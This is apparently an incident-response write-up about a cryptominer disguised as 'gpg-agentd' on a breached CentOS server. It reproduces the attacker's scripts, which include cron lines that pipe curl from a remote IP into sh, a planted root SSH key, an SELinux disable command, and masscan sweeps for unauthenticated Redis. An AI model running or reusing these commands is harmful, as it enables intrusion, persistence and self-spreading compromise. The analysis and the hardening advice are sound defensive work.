Unmasking the gpg‑agentd Malware: From Server Freeze to Full‑Scale Attack

0x00 Background

On a Monday morning the author discovered a server that could not be logged into; the operations team said Alibaba Cloud had frozen it for malicious outbound traffic. After a failed SSH attempt on port 22, the port was changed, revealing a root login with a weak password, indicating a breach.

0x01 Finding Clues

The CentOS 6.x server ran nginx, tomcat, redis and other services. After backing up the databases, the author noticed two processes named

gpg-agentd

consuming 99% CPU.

Google search showed that GPG’s

gpg-agent

can support SSH, which seemed legitimate, but the trailing "d" suggested a disguised malicious binary.

GPG provides a gpg‑agent that supports the SSH protocol, simplifying key management.

Running the following command revealed the process details:

<code>ps eho command -p 23374netstat -pan | grep 23374</code>

The investigation raised two questions:

1. How was the file uploaded? 2. What is its purpose?

History logs were cleared, leaving no trace. Further inspection of cron jobs showed a scheduled task that downloaded a script every 15 minutes.

Running

crontab -e

confirmed the malicious entry.

<code>crontab -e</code>

Thus the clue was found.

0x02 Motive

The cron job downloads and executes a script from

159.89.190.243/ash.php

every 15 minutes.

<code>curl -fsSL 159.89.190.243/ash.php &gt; ash.sh</code>

The script content is:

<code>uname -aidhostnamesetenforce 0 2&gt;/dev/nullulimit -n 50000ulimit -u 50000crontab -r 2&gt;/dev/nullrm -rf /var/spool/cron/* 2&gt;/dev/nullmkdir -p /var/spool/cron/crontabs 2&gt;/dev/nullmkdir -p /root/.ssh 2&gt;/dev/nullecho 'ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDfB19N9slQ6uMNY8dVZmTQAQhrdhlMsXVJeUD4AIH2tbg6Xk5PmwOpTeO5FhWRO11dh3inlvxxX5RRa/oKCWk0NNKmMza8YGLBiJsq/zsZYv6H6Haf51FCbTXf6lKt9g4LGoZkpNdhLIwPwDpB/B7nZqQYdTmbpEoCn6oHFYeimMEOqtQPo/szA9pX0RlOHgq7Duuu1ZjR68fTHpgc2qBSG37Sg2aTUR4CRzD4Li5fFXauvKplIim02pEY2zKCLtiYteHc0wph/xBj8wGKpHFP0xMbSNdZ/cmLMZ5S14XFSVSjCzIa0+xigBIrdgo2p5nBtrpYZ2/GN3+ThY+PNUqx redisX' &gt; /root/.ssh/authorized_keys
echo '*/15 * * * * curl -fsSL 159.89.190.243/ash.php|sh' &gt; /var/spool/cron/root
echo '*/20 * * * * curl -fsSL 159.89.190.243/ash.php|sh' &gt; /var/spool/cron/crontabs/root
yum install -y bash 2&gt;/dev/nullapt install -y bash 2&gt;/dev/nullapt-get install -y bash 2&gt;/dev/nullbash -c 'curl -fsSL 159.89.190.243/bsh.php|bash' 2&gt;/dev/null</code>

The script disables SELinux, adds an SSH public key for password‑less root login, installs bash, and then fetches a second script

bsh.php

.

The second script (

bsh.php

) performs the following actions:

<code>sleep $( seq 3 7 | sort -R | head -n1 )
... (omitted for brevity) ...
curl -sL -o x1.tar.gz https://github.com/robertdavidgraham/masscan/archive/1.0.4.tar.gz
... (install masscan) ...
curl -fsSL 159.89.190.243/rsh.php|bash</code>

Its four main functions are:

1. Download remote code and make it executable. 2. Modify rc.local for persistence. 3. Download the open‑source scanner masscan and install dependencies. 4. Download and run a third malicious script.

Masscan is described as a fast Internet port scanner capable of scanning the entire Internet in under six minutes, sending up to ten million packets per second.

MASSCAN: Mass IP port scanner – the fastest Internet port scanner, able to scan the whole Internet in under 6 minutes, transmitting 10 million packets per second.

The third script leverages a Redis misconfiguration to write SSH keys to the filesystem, then uses masscan to discover vulnerable Redis instances (default port 6379) across the Internet, harvesting them for further compromise.

<code>setenforce 0 2&gt;/dev/nullulimit -n 50000ulimit -u 50000
... (Redis configuration and masscan commands) ...
masscan --max-rate 10000 -p6379,6380 --shard $( seq 1 22000 | sort -R | head -n1 )/22000 --exclude 255.255.255.255 0.0.0.0/0 2&gt;/dev/null | awk '{print $6, substr($4, 1, length($4)-4)}' | sort | uniq &gt; .shards
... (further scanning loops) ...
rm -rf .dat .shard .ranges .lan 2&gt;/dev/null</code>

This demonstrates how the attacker gains persistent root access, spreads binaries, and uses Redis write‑through vulnerabilities to propagate the malware at scale.

0x03 Summary

Analyzing the three scripts reveals a chain: the attacker first injects an SSH public key, then downloads and runs remote binaries, and finally exploits an unauthenticated Redis instance to propagate across the Internet. The initial compromise likely stemmed from a brute‑forced root password, as evidenced by numerous

lastb

entries.

The mysterious

gpg-agentd

process appears to be a cryptocurrency miner, as strings related to Bitcoin and Ethereum were found, and the attacker references NiceHash mining pools.

0x04 Security Recommendations

Server

1. Disable direct root login. 2. Use complex usernames and passwords. 3. Change the default SSH port. 4. Install tools like DenyHosts to block brute‑force attempts. 5. Disable password authentication; use RSA keys only.

Redis

1. Disable public IP binding (no 0.0.0.0). 2. Require authentication passwords. 3. Run Redis under a low‑privilege account.

The author notes that the analysis may contain omissions and invites feedback.